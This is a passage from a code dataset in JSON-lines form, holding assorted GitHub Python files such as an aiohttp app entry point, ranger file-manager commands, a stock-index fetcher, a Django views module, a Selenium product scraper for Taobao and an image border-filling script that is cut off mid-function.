app.on_cleanup.append(close_pg)\n\n # setup views and routes\n setup_routes(app)\n\n # setup middlewares\n # setup_middlewares(app)\n\n # setup aiojobs scheduler\n setup_aiojobs(app)\n\n return app\n\n\napp = create_app()\n\n\nif __name__ == '__main__':\n web.run_app(app, host=settings.HOST, port=settings.PORT)\n\n # Why using thread pool at all? Because there can be blocking calls: https://pymotw.com/3/asyncio/executors.html\n # pool = ThreadPoolExecutor(max_workers=1)\n # loop.run_in_executor(self.pool, get_request, url)\n # data = deque([])\n","repo_name":"RNAcentral/rnacentral-sequence-search","sub_path":"sequence_search/consumer/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"35748580734","text":"dayname_fr = [\n \"Dimanche\",\n \"Lundi\",\n \"Mardi\",\n \"Mercredi\",\n \"Jeudi\",\n \"Vendredi\",\n \"Samedi\",\n \"Dimanche\",\n]\n\ndayname_en = [\n \"Sunday\",\n \"Monday\",\n \"Tuesday\",\n \"Wednesday\",\n \"Thursday\",\n \"Friday\",\n \"Saturday\",\n \"Sunday\",\n]\n\ndayname = dayname_fr\ndayname_int = {name.upper(): idx for idx, name in enumerate(dayname_en)}\n","repo_name":"MaKess/student-planner-web","sub_path":"webplanner/defines.py","file_name":"defines.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8401545777","text":"import logging\nfrom os.path import realpath\nfrom utils import create_environment_config\nfrom utils import unpack_tar\nfrom utils import neptune_download\nfrom utils import load_model\n\nDATA_VERSION = 'data_221101/'\n\"\"\"\nКоманды скрипта\n 1. Развернуть окружение\n 2. Обновить модель\n 3. Получить предикт\n 4. Обновить результаты\n\"\"\"\n\ndef set_environment(destination_folder:str):\n # Развертывание окружения\n # 1. Загружаем все словари и эмбеддинги word2 vec\n # 2. Распаковываем word2vec\n # 3. Загружаем версию 1 модели NN для HOME предикшн\n destination_folder = realpath(destination_folder) + '/'\n\n logging.basicConfig(\n level=logging.INFO,\n filename=destination_folder + \"set_environment.log\",\n filemode=\"w\",\n )\n env_dict = {\n DATA_VERSION + \"team_GId_dict\": \"team_GId_dict.pickle\",\n DATA_VERSION + \"word2vec\": \"word2vec.wordvectors.tar.gz\",\n }\n\n create_environment_config(\n {\"destination_folder\": destination_folder}\n )\n for cnt, env in enumerate(env_dict.items()):\n saved_name, file_name = env\n print(f\"Скачиваем: {file_name}...{cnt + 1}/{len(env_dict)}\")\n neptune_download(saved_name, destination_folder + file_name)\n if saved_name.split(\"/\")[1] != \"word2vec\":\n create_environment_config(\n {saved_name.split(\"/\")[1]: destination_folder + file_name}\n )\n\n create_environment_config(\n {\"word2vec\": unpack_tar(destination_folder + env_dict[DATA_VERSION + \"word2vec\"])}\n )\n model_num = 3\n model_type = \"HOME\"\n create_environment_config(\n {\n \"tf_model\": load_model(\n folder_name=destination_folder,\n model_num=model_num,\n model_type=model_type,\n ),\n \"model_type\": \"HOME\",\n \"model_no\": \"1\",\n }\n )\n\n","repo_name":"cappelchi/calcio","sub_path":"src/calcio/set_environment.py","file_name":"set_environment.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"75048717529","text":"import os\nimport numpy as np\nfrom treatment_graph import read_treatment_data\n\ndef main():\n dataset = 'auto25'\n if dataset == 'hao_true_lmci':\n file_name = 'hao_true_lmci,True,n,52,0.csv'\n feature_list = ['a', 'tau_p', 'n', 'c']\n treatment_time = 52\n treatment_feature = 'n'\n elif dataset == 'zheng':\n file_name = 'zheng,False,n,0,0.csv'\n feature_list = ['a', 'tau', 'n', 'c']\n treatment_time = 0\n treatment_feature = 'n'\n elif dataset == 'auto25':\n file_name = 'auto25,False,node_15,1,1.csv'\n feature_list = ['node_{}'.format(i) for i in range(5, 25)]\n treatment_time = 1\n treatment_feature = 'node_15'\n elif dataset == 'auto50':\n file_name = 'hao_true_lmci,True,n,52,0.csv'\n feature_list = ['node_{}'.format(i) for i in range(5, 50)]\n treatment_time = 1\n treatment_feature = 'node_15'\n else:\n raise ValueError('')\n data_dict, time_list = read_treatment_data(file_name, feature_list)\n valid_idx = 0\n for i, time in enumerate(time_list):\n if treatment_time > time:\n valid_idx = i\n\n result_dict = dict()\n for sample in data_dict:\n for model_name in data_dict[sample]:\n if model_name not in result_dict:\n result_dict[model_name] = dict()\n for feature in data_dict[sample][model_name]:\n if feature not in result_dict[model_name]:\n result_dict[model_name][feature] = []\n max_data = data_dict[sample][model_name][feature]['max'][valid_idx:]\n mean_data = data_dict[sample][model_name][feature]['mean'][valid_idx:]\n min_data = data_dict[sample][model_name][feature]['min'][valid_idx:]\n result_dict[model_name][feature].append([max_data, mean_data, min_data])\n\n for model_name in result_dict:\n full_obs = 0\n correct_obs = 0\n for feature in result_dict[model_name]:\n if feature == treatment_feature:\n continue\n oracle_data = np.array([item[1]for item in result_dict['oracle'][feature]])\n predict_max = np.array([item[0]for item in result_dict[model_name][feature]])\n predict_min = np.array([item[2]for item in result_dict[model_name][feature]])\n\n c1 = oracle_data < predict_max\n c2 = oracle_data > predict_min\n correct = c1 * c2\n full_obs = full_obs + len(correct) * len(correct[0])\n correct_obs = correct_obs + np.sum(correct)\n print('model name: {}, correct ratio: {}'.format(model_name, correct_obs/full_obs))\n print('')\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DanielSun94/CFPA","sub_path":"result_generate/treatment_inclusion.py","file_name":"treatment_inclusion.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"48556908224","text":"def Fn(n):\n if n <= 1:\n return n\n else:\n return(Fn(n-1) + Fn(n-2))\n\n# take input from the user\nn = int(input(\"Enter a Number: \"))\n\n# check if the number is valid\nif n <= 0:\n print(\"Invalid\")\nelse:\n print(\"Fibonacci sequence:\")\n for i in range(n):\n print(Fn(i))\n","repo_name":"HCYENDLURI/MyFirstPythonPro","sub_path":"FibonacciSeries.py","file_name":"FibonacciSeries.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41010659295","text":"import time, os\nfrom functools import wraps\nimport numpy as np\nprint(\"my_module\"+os.sep+\"time_deco.py is loaded\")\nglobal TIME_PRINT\nTIME_PRINT = 0\n\nproc_num=-1\ndef time_deco(_a, cn):\n def wrappedwrapper(f):\n @wraps(f)\n def wrapper(*args, **kwargs):\n global proc_num\n proc_num+=1\n now_num=proc_num\n if _a:\n print( '\\n{0:0>3}:{1}.{2}({3}, {4}) {5}'.format(proc_num, cn, str(f.__name__), \n [i if not isinstance(i, list) else np.array(i) for j,i in enumerate(args) if not j==0], kwargs, '-'*20))\n with open('log.txt', 'a') as fl:\n fl.write('\\n\\r{0:0>3}:{1}.{2}({3}, {4}) {5}\\n\\r'.format(proc_num, cn, str(f.__name__), \n [i if not isinstance(i, list) else np.array(i) for j,i in enumerate(args) if not j==0], kwargs, '-'*20))\n\n before = time.time()\n result = f(*args, **kwargs)\n after = time.time()\n if _a:\n print('{0}{1:0>3} was used {2} sec\\n'.format('-'*20, now_num, float(after - before))) \n with open('log.txt', 'a') as fl:\n fl.write('\\n\\r{0}{1:0>3} was used {2} sec\\n\\r'.format('-'*20, now_num, float(after - before)))\n return result \n return wrapper\n return wrappedwrapper\n","repo_name":"kirin-syukatu/module","sub_path":"time_deco.py","file_name":"time_deco.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27810213282","text":"# This is a sample commands.py. You can add your own commands here.\n#\n# Please refer to commands_full.py for all the default commands and a complete\n# documentation. Do NOT add them all here, or you may end up with defunct\n# commands when upgrading ranger.\n\n# A simple command for demonstration purposes follows.\n# -----------------------------------------------------------------------------\n\nfrom __future__ import (absolute_import, division, print_function)\n\n# You can import any python module as needed.\nimport os\n\n# You always need to import ranger.api.commands here to get the Command class:\nfrom ranger.api.commands import Command\n\nimport os\nfrom ranger.core.loader import CommandLoader\n\nclass extracthere(Command):\n def execute(self):\n \"\"\" Extract copied files to current directory \"\"\"\n copied_files = tuple(self.fm.copy_buffer)\n\n if not copied_files:\n return\n\n def refresh(_):\n cwd = self.fm.get_directory(original_path)\n cwd.load_content()\n\n one_file = copied_files[0]\n cwd = self.fm.thisdir\n original_path = cwd.path\n au_flags = ['-X', cwd.path]\n au_flags += self.line.split()[1:]\n au_flags += ['-e']\n\n self.fm.copy_buffer.clear()\n self.fm.cut_buffer = False\n if len(copied_files) == 1:\n descr = \"extracting: \" + os.path.basename(one_file.path)\n else:\n descr = \"extracting files from: \" + os.path.basename(one_file.dirname)\n obj = CommandLoader(args=['aunpack'] + au_flags \\\n + [f.path for f in copied_files], descr=descr)\n\n obj.signal_bind('after', refresh)\n self.fm.loader.add(obj)\n\nclass fzf_select(Command):\n \"\"\"\n :fzf_select\n\n Find a file using fzf.\n\n With a prefix argument select only directories.\n See: https://github.com/junegunn/fzf\n \"\"\"\n\n def execute(self):\n import subprocess\n if self.quantifier:\n # match only directories\n command = \"find -L . \\( -path '*/\\.*' -o -fstype 'dev' -o -fstype 'proc' \\) -prune \\\n -o -type d -print 2> /dev/null | sed 1d | cut -b3- | fzf +m\"\n else:\n # match files and directories\n command = \"find -L . \\( -path '*/\\.*' -o -fstype 'dev' -o -fstype 'proc' \\) -prune \\\n -o -print 2> /dev/null | sed 1d | cut -b3- | fzf +m\"\n fzf = self.fm.execute_command(command, stdout=subprocess.PIPE)\n stdout, stderr = fzf.communicate()\n if fzf.returncode == 0:\n fzf_file = os.path.abspath(stdout.decode('utf-8').rstrip('\\n'))\n if os.path.isdir(fzf_file):\n self.fm.cd(fzf_file)\n else:\n self.fm.select_file(fzf_file)\n","repo_name":"kuzzmi/dotfiles","sub_path":"ranger/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"32368033526","text":"import numpy as np\nfrom typing import Dict, List\nfrom .textures import get_texture\nfrom .materials import get_material\nfrom .utils import get_quaternion\n\n\nKUBASIC_IDS = (\n \"cube\", \n \"cylinder\", \n \"sphere\", \n \"cone\", \n \"torus\", \n \"gear\",\n \"torus_knot\", \n \"sponge\", \n \"spot\", \n \"suzanne\"\n)\n\nTEXTURES = [\n 'NONE',\n # 'IMAGE',\n 'CLOUDS',\n 'DISTORTED_NOISE',\n 'MAGIC',\n 'MARBLE',\n 'MUSGRAVE',\n 'STUCCI',\n 'VORONOI',\n 'WOOD'\n]\n\n\ndef latent_dataset(\n num_scenes: int = 100,\n resolution: List[int] = [256, 144],\n min_num_objects: int = 3,\n max_num_objects: int = 6,\n spawn_region: List[List[float]] = [[-2.5, -3.0, 0.2], [2.5, 3.0, 1.5]],\n sun_position: List[float] = [0.0, 0.0, 7.0],\n camera_position: List[float] = [0.0, -8.0, 3.6],\n camera_look_at: List[float] = [0.0, 0.0, 0.5],\n camera_focal_length: float = 32.0,\n camera_sensor_width: float = 30.0,\n floor_scale: List[float] = [20.0, 40.0, 0.01],\n floor_position: List[float] = [0.0, 0.0, 0.0],\n background_type: str = \"artificial\",\n dataset_comment: str = \"test\"\n) -> List[Dict]:\n \n \"\"\"\n A dataset returns a list of dictionaries, each dictionary is the config for a single scene.\n default values are set for mouse data.\n\n The dataset thus contains all the scenes that will be subsequently generated.\n The list of config dictionaries will be passed to the ImageConfig table, and from there it will be rendered.\n So this function will not generate scenes yet, but it will create the configs that will generate the scenes.\n\n Args:\n num_scenes: number of scenes to generate scene configs for\n resolution: (height, width)\n min_num_objects: minimum number of objects in a scene\n max_num_objects: maximum number of objects in a scene\n spawn_region: [[min_x, min_y, min_z], [max_x, max_y, max_z]]\n sun_position: [x, y, z]\n camera_position: [x, y, z]\n camera_look_at: [x, y, z]\n camera_focal_length: focal length of the camera\n camera_sensor_width: sensor width of the camera\n floor_scale: [x, y, z]\n floor_position: [x, y, z]\n background_type: \"artificial\" or \"realistic\"\n dataset_comment: str describing the dataset\n\n Returns:\n A list of dictionaries, each dictionary is the config for a single image.\n \"\"\"\n\n if len(resolution) != 2:\n raise ValueError(\n \"resolution should be a list of ints of length=2, e.g., [256, 256]\"\n )\n\n if len(spawn_region) != 2:\n raise ValueError(\n \"spawn region should be a list of lists of length 3, e.g., [[-2.5, -3.0, 0.2], [2.5, 3.0, 1.5]]\"\n )\n\n for sr in spawn_region:\n if len(sr) != 3:\n raise ValueError(\n \"spawn region should be a list of 2 lists of length 3, e.g., [[-2.5, -3.0, 0.2], [2.5, 3.0, 1.5]]\"\n )\n\n if len(sun_position) != 3:\n raise ValueError(\n \"sun position should be a list of length 3, e.g., [0.0, 0.0, 7.0]\"\n )\n\n if len(camera_position) != 3:\n raise ValueError(\n \"camera position should be a list of length 3, e.g., [0.0, -8.0, 3.6]\"\n )\n\n if len(camera_look_at) != 3:\n raise ValueError(\n \"camera look at should be a list of length 3, e.g., [0.0, 0.0, 0.5]\"\n )\n\n if len(floor_scale) != 3:\n raise ValueError(\n \"floor scale should be a list of length 3, e.g., [20.0, 40.0, 0.01]\"\n )\n\n if len(floor_position) != 3:\n raise ValueError(\n \"floor position should be a list of length 3, e.g., [0.0, 0.0, 0.0]\"\n )\n \n rng = np.random.default_rng()\n seeds = rng.choice(2147483647, size=num_scenes, replace=False)\n scenes = []\n \n for seed in seeds:\n latents = {}\n\n rng = np.random.RandomState(seed)\n latents[\"seed\"] = seed\n\n # set resolution\n latents[\"resolution\"] = resolution\n\n # set spawn region\n latents[\"spawn_region\"] = spawn_region\n\n # set sun position\n latents[\"sun_position\"] = sun_position\n latents[\"sun_position\"][0] = rng.uniform(-1, 1)\n latents[\"sun_position\"][1] = rng.uniform(-1, 1)\n\n # set camera position\n latents[\"camera_position\"] = camera_position\n\n # set camera look at\n latents[\"camera_look_at\"] = camera_look_at\n\n # set camera focal length\n latents[\"camera_focal_length\"] = camera_focal_length\n\n # set camera sensor width\n latents[\"camera_sensor_width\"] = camera_sensor_width\n\n # set floor scale\n latents[\"floor_scale\"] = floor_scale\n\n # set floor position\n latents[\"floor_position\"] = floor_position\n\n # set background type\n if background_type == \"artificial\":\n latents[\"bg_texture\"] = get_texture(\n rng.choice(TEXTURES), rng, True\n )\n elif background_type == \"realistic\":\n latents[\"bg_texture\"] = get_texture(\n \"IMAGE\", rng, True\n )\n else:\n raise ValueError(\n \"Invalid background type: background_type can be either 'artificial' or 'realistic'\"\n )\n\n # set the background material\n latents[\"bg_material\"] = get_material(rng)\n \n # set ambient illumination\n latents[\"ambient_illumination\"] = rng.uniform(0.4, 0.7)\n \n # object properties\n # number of objects in the scene \n # visibility and overlap depend on camera position and spawn region\n latents[\"num_objects\"] = rng.randint(min_num_objects, max_num_objects + 1)\n \n # choose #num_objects KuBasic shapes\n latents[\"object_shapes\"] = rng.choice(KUBASIC_IDS, size=latents[\"num_objects\"])\n \n # set #num_objects scales\n latents[\"object_scales\"] = rng.uniform(0.6, 1.2, size=latents[\"num_objects\"])\n \n # set #num_objects angles of rotation in (0, 2pi)\n latents[\"object_angles_of_rotation\"] = rng.uniform(0, 2*np.pi, size=latents[\"num_objects\"])\n \n # choose axes of rotation for the objects\n latents[\"object_axes_of_rotation\"] = rng.choice([\"x\", \"y\", \"z\"], size=latents[\"num_objects\"])\n \n # get object quaternions\n latents[\"object_quaternions\"] = [\n get_quaternion(\n latents[\"object_axes_of_rotation\"][k],\n latents[\"object_angles_of_rotation\"][k]\n ) for k in range(latents[\"num_objects\"])\n ]\n \n # set object textures\n latents[\"object_textures\"] = [\n get_texture(\n rng.choice(TEXTURES), \n rng, \n False\n ) for _ in range(latents[\"num_objects\"])\n ]\n \n # set object materials\n latents[\"object_materials\"] = [get_material(rng) for _ in range(latents[\"num_objects\"])]\n \n # append to dataset\n scenes.append(latents)\n\n return scenes","repo_name":"nkarantzas/renderstim","sub_path":"renderstim/latents/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27222179199","text":"import copy\nraw = list(el.strip() for el in open(\"input.txt\").readlines())\ncopy1, copy2 = [], []\ncount = [0 for i in range(len(raw[0]))]\ntotal = len(raw)\n\n\nfor el in raw:\n for i in range(len(el)):\n if el[i] == '0':\n pass\n else:\n count[i] += 1\n\ngamma, epsilon = 0, 0\n\nn = 0\nfor el in count[::-1]:\n if el >= len(raw) // 2:\n gamma += 2 ** n\n else:\n epsilon += 2 ** n\n n += 1\n\nprint(f\"{gamma * epsilon}\")\n\n\nfor el in raw:\n copy1.append(el)\n copy2.append(el)\n\nfor i in range(len(count)): count[i] = 0\n\nouter = len(raw[0])\n\nfor i in range(outer):\n if len(copy1) == 1:\n break\n for j in range(len(copy1)):\n if copy1[j][i] == '1':\n count[i] += 1\n \n if count[i] >= len(copy1) - count[i]:\n copy1 = list(filter(lambda s : s[i] == '1', copy1))\n else:\n copy1 = list(filter(lambda s : s[i] != '1', copy1))\n\nfor i in range(len(count)): count[i] = 0\n\nfor i in range(outer):\n if len(copy2) == 1:\n break\n for j in range(len(copy2)):\n if copy2[j][i] == '1':\n count[i] += 1\n \n if count[i] >= len(copy2) - count[i]:\n copy2 = list(filter(lambda s : s[i] == '0', copy2))\n else:\n copy2 = list(filter(lambda s : s[i] == '1', copy2))\n\n\no2 = int(f'0b{copy1[0]}', base=2)\nco2 = int(f'0b{copy2[0]}', base=2)\n\nprint(f\"{o2 * co2}\")","repo_name":"Vaascoo/AOC21","sub_path":"03/aoc3.py","file_name":"aoc3.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74320064409","text":"import copy\n\nfrom fiddle._src import config as config_lib\nfrom fiddle._src import mutate_buildable\n\n\ndef copy_with(\n buildable: config_lib.BuildableT, **kwargs\n) -> config_lib.BuildableT:\n \"\"\"Returns a shallow copy of ``buildable`` with updates to arguments.\n\n Args:\n buildable: A ``Buildable`` (e.g. a ``fdl.Config``) to copy and mutate.\n **kwargs: The arguments and values to assign.\n \"\"\"\n buildable = copy.copy(buildable)\n mutate_buildable.assign(buildable, **kwargs)\n return buildable\n\n\ndef deepcopy_with(buildable: config_lib.Buildable, **kwargs):\n \"\"\"Returns a deep copy of ``buildable`` with updates to arguments.\n\n Note: if any ``Config``'s inside ``buildable`` are shared with ``Config``'s\n outside of ``buildable``, then they will no longer be shared in the returned\n value. E.g., if ``cfg1.x.y is cfg2``, then\n ``fdl.deepcopy_with(cfg1, ...).x.y is cfg2`` will be ``False``.\n\n Args:\n buildable: A ``Buildable`` (e.g. a ``fdl.Config``) to copy and mutate.\n **kwargs: The arguments and values to assign.\n \"\"\"\n buildable = copy.deepcopy(buildable)\n mutate_buildable.assign(buildable, **kwargs)\n return buildable\n","repo_name":"google/fiddle","sub_path":"fiddle/_src/copying.py","file_name":"copying.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"31"} +{"seq_id":"74175535127","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.contrib.auth import authenticate\n\nfrom .forms import ContactForm\n\n\ndef home_page(request):\n context = {\n \"title\": \"Hello World!\",\n \"content\": \"Welcome to the homepage.\"\n }\n if request.user.is_authenticated():\n context[\"premium_content\"] = \"YEEEEEAAAAAHHH!\"\n return render(request, \"home.html\", context)\n\n\ndef about_page(request):\n context = {\n \"title\": \"About Page!\",\n \"content\": \"Welcome to the about page.\"\n }\n return render(request, \"home.html\", context)\n\n\ndef contact_page(request):\n contact_form = ContactForm(request.POST or None)\n context = {\n \"title\": \"Contact Page!\",\n \"content\": \"Welcome to the contact page.\",\n \"form\": contact_form\n }\n if contact_form.is_valid():\n print(contact_form.cleaned_data)\n # if request.method == \"POST\":\n # # print(request.POST)\n # print(request.POST.get('fullname'))\n # print(request.POST.get('email'))\n # print(request.POST.get('content'))\n return render(request, \"contact/view.html\", context)\n\n\n# def home_page_old(request):\n# return HttpResponse(\"Hello World\")\n","repo_name":"alejovp/django-ecommerce","sub_path":"src/ecommerce/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2552934496","text":"# Jugaad_data (Indian market live)\n# prettyTable to print data in tabular format\nfrom jugaad_data.nse import NSELive\nimport pandas as pd\n\n# colors\ngreen = \"\\033[1;32m%s\\033[0m\"\nred = \"\\033[1;31m%s\\033[0m\"\n\n# returns string in green\ndef positive_change(change):\n return green %str(change)[0:7]\n\n# returns string in red\ndef negative_change(change):\n return red %str(change)[0:7]\n\n\n# Initiate the connection\nn = NSELive()\n\n# Get the all the indices from the market\nall_indices = n.all_indices()['data']\n\ndf = pd.DataFrame(columns=['SYMBOL', 'OPEN', 'HIGH', 'LOW', 'CLOSE', 'CHANGE', 'ADVANCES', 'DECLINES', 'UNCHANGED'])\nfor index in all_indices:\n advances = index['advances'] if 'advances' in index else None\n declines = index['declines'] if 'declines' in index else None\n unchanged = index['unchanged'] if 'unchanged' in index else None\n\n if advances is None or declines is None or unchanged is None:\n continue\n\n change = index['last'] - index['open']\n new_record = pd.DataFrame([{'SYMBOL': index['indexSymbol'],\n 'OPEN': float(index['open']),\n 'HIGH': float(index['high']),\n 'LOW': float(index['low']),\n 'CLOSE': float(index['last']),\n 'CHANGE': float((str(change)[0:7])),\n 'ADVANCES': float(advances),\n 'DECLINES': float(declines),\n 'UNCHANGED': float(unchanged),\n }])\n\n df = pd.concat([df, new_record], ignore_index=True)\n\ndf = df.sort_values(by=['CHANGE'], ascending=False)\ndf.to_excel('indices.xlsx', sheet_name='indices', engine='openpyxl', index=False)\nprint(df.to_string())","repo_name":"hemanth-tr/NSEProject","sub_path":"indices_pandas.py","file_name":"indices_pandas.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9144340942","text":"\nfrom Utility import InputLoader\n\ncount = []\n\nwith InputLoader(day=3) as reader:\n for line in reader:\n for i, char in enumerate(line):\n if len(count) <= i:\n count.append({\"0\": 0, \"1\": 0})\n count[i][char] += 1\n\ngamma_str = \"\".join(\"1\" if x[\"1\"] >= x[\"0\"] else \"0\" for x in count)\nepsilon_str = \"\".join(\"1\" if x[\"1\"] < x[\"0\"] else \"0\" for x in count)\n\ngamma = int(gamma_str, 2)\nepsilon = int(epsilon_str, 2)\n\nprint(f\"GAMMA = {gamma}, EPSILON = {epsilon}\")\nprint(f\"MULTIPLIED = {gamma * epsilon}\")\n","repo_name":"cgdilley/AdventOfCode2021","sub_path":"src/Day03/Day03.0.py","file_name":"Day03.0.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"69804494170","text":"import streamlit as st\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom PIL import Image\r\nmodel=tf.keras.models.load_model('potato-leaf-disease-detection/model.h5')\r\nclasses=['Potato Early blight', 'Potato Late blight', 'Potato healthy']\r\nst.title('Potato Leaf Disease Prediction')\r\n\r\n\r\n\r\ndef get_result(image):\r\n if image:\r\n st.image(uploaded_img)\r\n img=Image.open(image).resize((224,224))\r\n img_arr=np.array(img).reshape(1,224,224,3)\r\n\r\n prediction=model.predict(img_arr)\r\n st.write('Result')\r\n st.success(classes[np.argmax(prediction)])\r\n st.write('Accuracy')\r\n st.info(f\"{round(prediction.max(),2)*100}%\")\r\n\r\n\r\nselection=st.selectbox('Select Option',options=['Uploading Image','Using Camera'])\r\nif selection=='Uploading Image':\r\n st.write('You should upload image ')\r\n uploaded_img=st.file_uploader('Upload Here',type=['png','jpg','jpeg'])\r\n get_result(uploaded_img)\r\nelse:\r\n st.write('You should take a leaf picture') \r\n camera_img=st.camera_input('Take picture')\r\n get_result(camera_img)\r\n","repo_name":"shaxzoddavronov/portfolio","sub_path":"potato-leaf-disease-detection/potato_leaf_app.py","file_name":"potato_leaf_app.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19604462345","text":"def perulangan():\n\n\tprint(\" \")\n\n\tmax=0\n\twhile True :\n\t\ta=int(input(\"Masukan Bilangan = \"))\n\t\tif max < a:\n\t\t\tmax = a\n\t\tif a==0:\n\n\t\t\tprint(\" \")\n\t\t\tprint(\"Bilangan Terbear =\" ,max)\n\t\t\tprint(\" \")\n\t\t\tprint(\"Terimakasih Telah Menggunakan Program Ini\")\n\t\t\tprint(\" \")\n\t\t\tprint(\"DILARANG MENG COPY PROGRAM INI\")\n\t\t\tPRINT(\" \")\n\t\t\tjawab = \"ya\"\n\t\t\twhile jawab ==\"ya\":\n\t\t\t\tjawab =input(\"Ingin Mengulang Program Ini ? (ya/tidak)\")\n\t\t\t\tif jawab == \"ya\":\n\t\t\t\t\treturn perulangan()\n\t\t\t\telif jawab ==\"tidak\":\n\t\t\t\t\tbreak\n\t\t\t\tprint(\" \")\nperulangan()","repo_name":"uden28/lapyh03","sub_path":"latihan2.py","file_name":"latihan2.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13416098523","text":"'''\n上一个例子中成功尝试分析Ajax来抓取数据,但是并不是所有页面都可以分析Ajax来抓取,像淘宝虽然页面数据也是\n通过Ajax获取的,但是这些Ajax接口参数复杂,可能包含加密密钥等。这种页面,最快捷的抓取方法就是通过Selenium。\n\nReference: Python3 网络爬虫开发实战,Page 289\n'''\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom urllib.parse import quote\nfrom pyquery import PyQuery as pq\n\nbrowser=webdriver.Chrome()\n\nwait=WebDriverWait(browser, 10)\nKEYWORD='iPad'\n\ndef index_page(page):\n '''\n 抓取索引页\n :param page: 页码\n '''\n print('正在爬取第 ', page, '页')\n try:\n url='https://s.taobao.com/search?q=' + quote(KEYWORD)\n browser.get(url)\n if page > 1:\n input=wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '#mainsrp-pager div.form > input'))\n )\n submit=wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '#mainsrp-pager div.form > \\\n span.btn.J_Submit')))\n input.clear()\n input.send_keys(page)\n submit.click()\n '''\n 以下两个wait只是用来等待网页加载完毕\n '''\n wait.until(\n EC.text_to_be_present_in_element((By.CSS_SELECTOR, '#mainsrp-pager li.item.active > span'), str(page))\n ) #判断span元素中是否存在指定的str(page)文本\n\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '.m-itemlist .items .item')))\n get_products()\n except TimeoutError:\n index_page(page)\n\n\ndef get_products():\n '''\n 提取商品数据\n '''\n html=browser.page_source\n doc=pq(html)\n items=doc('#mainsrp-itemlist .items .item').items()\n for item in items:\n product={\n 'image':item.find('.pic .img').attr('data-src'),\n 'price':item.find('.price').text(),\n 'deal':item.find('.deal-cnt').text(),\n 'title':item.find('.title').text(),\n 'shop':item.find('.shop').text(),\n 'location':item.find('.location').text()\n }\n print(product)\nindex_page(1)","repo_name":"vivver4/Python_Spider","sub_path":"Example_Demo/抓取淘宝商品.py","file_name":"抓取淘宝商品.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26879451679","text":"import os\r\nfrom PIL import Image\r\nfrom tqdm import tqdm\r\n\r\ndef cornerLeftFill(xStart, xEnd, y):\r\n fillColor = pix[(xEnd + 1), y]\r\n for x in range(xEnd - xStart):\r\n try:\r\n pix[(xStart+x), y] = fillColor\r\n except Exception:\r\n pass\r\n\r\ndef cornerRightFill(xStart, xEnd, y):\r\n fillColor = pix[(xEnd - 1), y]\r\n for x in range(xStart - xEnd):\r\n try:\r\n pix[(xStart-x), y] = fillColor\r\n except Exception:\r\n pass\r\n\r\ndef CornerFill():\r\n TopCornerList = [35, 28, 23, 22, 19, 19, 15, 15, 13, 13, 11, 11, 9, 9, 7, 7, 7, 7, 5, 5, 5, 4, 3, 3, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2] #Gross, but works\r\n y = 0\r\n for x in TopCornerList:\r\n cornerLeftFill(0, x, y)\r\n y +=1\r\n\r\n y = 0\r\n for x in TopCornerList:\r\n newX = 750-x\r\n cornerRightFill(750, newX, y)\r\n y +=1\r\n\r\n y = 1000\r\n for x in range(46):\r\n cornerLeftFill(0, 32, y)\r\n y +=1\r\n\r\n y = 1000\r\n for x in range(46):\r\n newX = 750-33\r\n cornerRightFill(750, newX, y)\r\n y +=1\r\n\r\ndef boarderFill(): #Creation of extra boarder\r\n for y in range(1046):\r\n for x in range(750):\r\n fillColor = pix[x, y]\r\n newPix[x+33, y+32] = fillColor\r\n if y == 0:\r\n for b in range(32):\r\n newY = y+31-b\r\n newPix[x+33, newY] = fillColor\r\n elif y == 1045:\r\n for b in range(32):\r\n newY = y+33+b\r\n newPix[x+33, newY] = fillColor\r\n elif x == 0:\r\n for b in range(33):\r\n newX = x+32-b\r\n newPix[newX, y+32] = fillColor\r\n elif x 